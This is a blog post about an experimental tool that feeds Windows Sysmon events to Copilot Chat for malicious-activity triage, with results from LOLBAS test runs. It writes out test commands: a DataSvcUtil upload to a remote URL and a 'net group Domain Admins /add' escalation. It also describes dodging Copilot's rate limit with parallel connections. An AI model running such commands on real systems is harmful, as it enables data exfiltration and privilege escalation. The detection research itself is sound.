14 April 2025
Claudio Contin
Introduction
Andrej Karpathy (OpenAI co-founder) coined the term "vibe coding": writing software with AI purely through prompts, without needing coding skills.
Given the vibes of our current times, a few days ago I was thinking: what's the "vibest" thing I could try to build in a few hours?
Then I remembered that Windows ships with the Copilot Chat application, which allows users to interact with the Copilot LLM without needing a paid Copilot API plan.
So I thought: would it be possible to deliver Windows host events to this LLM and let it determine whether they are the result of malicious actions?
I decided to investigate how the Windows Copilot application works... Buckle up and get ready to vibe!
Copilot Chat
The built-in Windows Copilot application is nothing more than a Progressive Web Application (PWA) that can be installed on a device and accessed as a standalone application. The application loads and renders the Copilot web application.
When a new chat is started, the application makes an HTTP POST request to the /c/api/start?dpwa=1 endpoint.
Once the conversation ID is returned, the application then switches protocol to use WebSocket, and the chat communication is performed over this channel.
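The first step of that handshake can be sketched in Python (the tool itself is not written in Python; this is only an illustration). Only the path comes from the traffic described above. The host name below is a hypothetical placeholder, and the empty JSON body is an assumption, since neither is stated here. The request is built but never sent, and the WebSocket step is left out because its URL is not given.

```python
from urllib.parse import urljoin
from urllib.request import Request

# Path observed in the Copilot Chat traffic described above.
START_PATH = "/c/api/start?dpwa=1"


def build_start_request(base_url: str) -> Request:
    """Build (but do not send) the POST that opens a new conversation."""
    url = urljoin(base_url, START_PATH)
    # Assumption: an empty JSON body. The real payload is not documented here.
    return Request(
        url,
        data=b"{}",
        method="POST",
        headers={"Content-Type": "application/json"},
    )


# Hypothetical host, used only so the example has something to print.
req = build_start_request("https://copilot.example.invalid")
print(req.get_method(), req.full_url)
```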
Sysmon
I decided to enable Sysmon on my test host. For the Sysmon configuration I used https://github.com/SwiftOnSecurity/sysmon-config/blob/master/sysmonconfig-export.xml.
Sysmon events are visible from the Event Viewer, and can be programmatically queried using the Microsoft-Windows-Sysmon/Operational log channel. Note that local administrator privileges are required in order to view and query Sysmon events (high integrity level).
I decided to query these Sysmon generated events (the raw XML which contains the full event details), send them to Copilot for analysis, and let Copilot decide if any of them contain any potentially malicious actions.
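As a rough illustration of that querying step (not the tool's own code), the Python sketch below shells out to the built-in wevtutil utility and parses the XML it returns. The function names and the sample event are made up for the example. The actual query only works on Windows from an elevated prompt, so the demonstration at the end parses a small hand-written sample instead.

```python
import subprocess
import xml.etree.ElementTree as ET

CHANNEL = "Microsoft-Windows-Sysmon/Operational"
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def wevtutil_command(count: int) -> list[str]:
    """Command that dumps the newest `count` events as XML under one root element."""
    return ["wevtutil", "qe", CHANNEL, "/f:xml", f"/c:{count}", "/rd:true", "/e:Events"]


def parse_events(xml_text: str) -> list[dict]:
    """Extract the event ID, named data fields and XML of each <Event>."""
    events = []
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        events.append({
            "id": int(ev.findtext("e:System/e:EventID", namespaces=NS)),
            "data": {d.get("Name"): d.text or "" for d in ev.findall("e:EventData/e:Data", NS)},
            # Re-serialised by ElementTree, so namespace prefixes may differ from the log.
            "xml": ET.tostring(ev, encoding="unicode"),
        })
    return events


def read_sysmon_events(count: int = 10) -> list[dict]:
    """Windows only; requires an elevated (high integrity) process."""
    out = subprocess.run(wevtutil_command(count), capture_output=True, text=True, check=True)
    return parse_events(out.stdout)


# Hand-written sample so the parser can be tried on any platform.
SAMPLE = (
    "<Events><Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'>"
    "<System><EventID>1</EventID></System>"
    "<EventData><Data Name='Image'>C:\\Windows\\System32\\whoami.exe</Data></EventData>"
    "</Event></Events>"
)
events = parse_events(SAMPLE)
print(events[0]["id"], events[0]["data"]["Image"])
```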
EDV tool
I wrote the EDV tool, which queries Sysmon events and delivers them to Copilot for analysis over the WebSocket channel, in the same way as the Copilot Chat application. If you are wondering whether AI was used to help code it: ooohhh yessss, this is all about vibes!
The tool can be run in two different modes:
- Sync
- Async
I originally implemented only the sync mode, which obtains a new conversation ID from the Copilot endpoint mentioned earlier and establishes a single WebSocket connection that is used to send events and receive responses synchronously and in chronological order (earlier events first). If multiple prompts are sent concurrently over the same WebSocket channel, the Copilot endpoint returns a rate-limiting error (too many requests).
While writing, or better vibing, the tool, I then tried establishing a new WebSocket connection for each event and sending a few of them in parallel, using the same conversation ID for all. In this scenario, the Copilot endpoint did not prevent concurrent requests. For this reason, the tool can also be launched in async mode. Note that in this mode the events are not sent synchronously or in chronological order, which might reduce the detection capability but increases the speed of delivery, especially when several events are generated within a short time frame.
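The difference between the two modes can be sketched with asyncio in Python. This is an illustration under assumptions, not the tool's code: fake_send is a stand-in for a real WebSocket round trip, and the limit of three requests in flight is an arbitrary value chosen for the example.

```python
import asyncio


async def fake_send(event: str, log: list) -> str:
    """Stand-in for one WebSocket round trip; always answers "OK"."""
    await asyncio.sleep(0.01)
    log.append(event)
    return "OK"


async def run_sync(events, log):
    """One prompt in flight at a time, oldest event first."""
    return [await fake_send(ev, log) for ev in events]


async def run_async(events, log, limit=3):
    """One simulated connection per event, at most `limit` in flight at once."""
    gate = asyncio.Semaphore(limit)

    async def one(ev):
        async with gate:
            return await fake_send(ev, log)

    # gather returns replies in input order even if they complete out of order.
    return await asyncio.gather(*(one(ev) for ev in events))


events = ["event-1", "event-2", "event-3", "event-4"]
sync_log, async_log = [], []
sync_replies = asyncio.run(run_sync(events, sync_log))
async_replies = asyncio.run(run_async(events, async_log))
print(sync_log, sorted(async_log))
```

In the sequential version the delivery order is guaranteed to match the event order. In the concurrent version only the set of delivered events is guaranteed, which is the trade-off described above.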
The tool also accepts a conversation ID and a comma-separated list of event IDs as optional arguments. The conversation ID makes it possible to reuse an existing Copilot conversation rather than starting a new one. The event IDs argument restricts the inspection to specific events. Sysmon event IDs range from 1 to 31.
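A command line of this shape could be parsed as in the Python sketch below. The program name and the flag names (--conversation-id, --event-ids) are hypothetical and chosen only for illustration; the real tool's argument names are not given here.

```python
import argparse


def parse_event_ids(value: str) -> list[int]:
    """Turn a string such as "1,3,22" into [1, 3, 22]."""
    ids = [int(part) for part in value.split(",") if part.strip()]
    if any(event_id < 1 for event_id in ids):
        raise argparse.ArgumentTypeError("event IDs must be positive integers")
    return ids


def build_parser() -> argparse.ArgumentParser:
    parser = argparse.ArgumentParser(prog="edv-sketch")  # hypothetical name
    parser.add_argument("mode", choices=["sync", "async"])
    # Optional: reuse an existing conversation instead of starting a new one.
    parser.add_argument("--conversation-id", default=None)
    # Optional: only inspect these Sysmon event IDs.
    parser.add_argument("--event-ids", type=parse_event_ids, default=None)
    return parser


args = build_parser().parse_args(["async", "--event-ids", "1,3,22"])
print(args.mode, args.conversation_id, args.event_ids)
```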
The prompt used to query Copilot is:
This is a Sysmon event of my Windows host. Does the event indicate anything malicious happening on my host?
You can use the previous events I already sent if it helps contextualizing this new event.
If yes, please respond with just "ALERT". If not, or you are not certain,
respond with just "OK" (also in the case you do not really understand the event).
Disregard domain names (do not want false positives).
Sysmon event raw XML is: [Raw XML Sysmon event]
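Building this prompt and reading the one-word verdict back can be sketched in Python as follows. The prompt text is the one shown above; the helper names and the tolerance for stray quotes, spaces or a trailing period in the reply are assumptions made for the example.

```python
PROMPT_TEMPLATE = (
    "This is a Sysmon event of my Windows host. "
    "Does the event indicate anything malicious happening on my host?\n"
    "You can use the previous events I already sent if it helps contextualizing this new event.\n"
    'If yes, please respond with just "ALERT". If not, or you are not certain,\n'
    'respond with just "OK" (also in the case you do not really understand the event).\n'
    "Disregard domain names (do not want false positives).\n"
    "Sysmon event raw XML is: "
)


def build_prompt(event_xml: str) -> str:
    """Append the raw event XML to the fixed instructions."""
    return PROMPT_TEMPLATE + event_xml


def is_alert(reply: str) -> bool:
    """Treat only a bare ALERT as a detection; anything else counts as OK."""
    return reply.strip().strip('".').upper() == "ALERT"


prompt = build_prompt("<Event/>")
print(is_alert('"ALERT"'), is_alert("OK"), is_alert("Possibly an ALERT"))
```

Treating every reply other than a bare ALERT as OK mirrors the prompt's own instruction to answer OK when uncertain.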
The reason I asked Copilot to disregard domain names is that it flagged several online advertisement domains as potentially malicious. For example, while I was browsing news websites, Copilot started responding with "ALERT" for events related to DNS lookups of these advertisement domains. I tried editing the prompt to instruct it to raise alerts for these domains only if absolutely certain, but this did not improve the results.
Finally, the tool disregards all events generated by the EDV itself, by using this simple regex against the Sysmon raw XML event:
string pattern = @"<Data Name=['""]Image['""]>.*\\EDV\.exe</Data>";
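For comparison, here is a Python counterpart of that filter. It is deliberately a slightly stricter variant, not a literal port: it uses [^<]* instead of .* so the match cannot run past the Image element. If the raw XML is on a single line, the original .* may also match events whose ParentImage (rather than Image) ends in \EDV.exe. The install path in the samples is hypothetical.

```python
import re

# Stricter variant of the C# pattern: [^<]* keeps the match inside the Image element.
SELF_IMAGE = re.compile(r"<Data Name=['\"]Image['\"]>[^<]*\\EDV\.exe</Data>")


def is_own_event(event_xml: str) -> bool:
    """True when the event's Image field points at EDV.exe itself."""
    return SELF_IMAGE.search(event_xml) is not None


# Hypothetical paths, for illustration only.
own = "<Data Name='Image'>C:\\Tools\\EDV.exe</Data>"
child = (
    "<Data Name='Image'>C:\\Windows\\System32\\cmd.exe</Data>"
    "<Data Name='ParentImage'>C:\\Tools\\EDV.exe</Data>"
)
print(is_own_event(own), is_own_event(child))  # True False
```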
Results
For testing, I ran several Living Off The Land Binaries, Scripts and Libraries (LOLBAS), along with common PowerShell commands to run Base64-encoded input and execute external scripts downloaded from remote HTTP endpoints.
The tests were performed with Windows Defender enabled. Some of the commands were detected by Defender, which resulted in no event being saved in the Sysmon logs.
Events of the same kind, especially process creation events, were not always flagged as malicious, which suggests that Copilot may take previous events into account before deciding whether to flag a given event. For example, this command (from LOLBAS) was not consistently flagged as malicious: DataSvcUtil /out:C:\Windows\Temp\data.log /uri:https://www.program-api.org/v1/upload
For events not blocked by Defender, Copilot was able to mark around 40% of the tested LOLBAS as malicious. Common actions, such as adding a domain user to the Domain Admins group (net group "Domain Admins" legit /add /domain), were flagged as well. Below is an example of the Defender Real-time protection disable action which Copilot flagged.
Conclusion
Even though several false positives and false negatives were observed during testing, the results indicate that, for some specific events, Copilot flagged potentially malicious actions that Windows Defender did not catch.
Note: The tool is not intended for actual use — just vibes!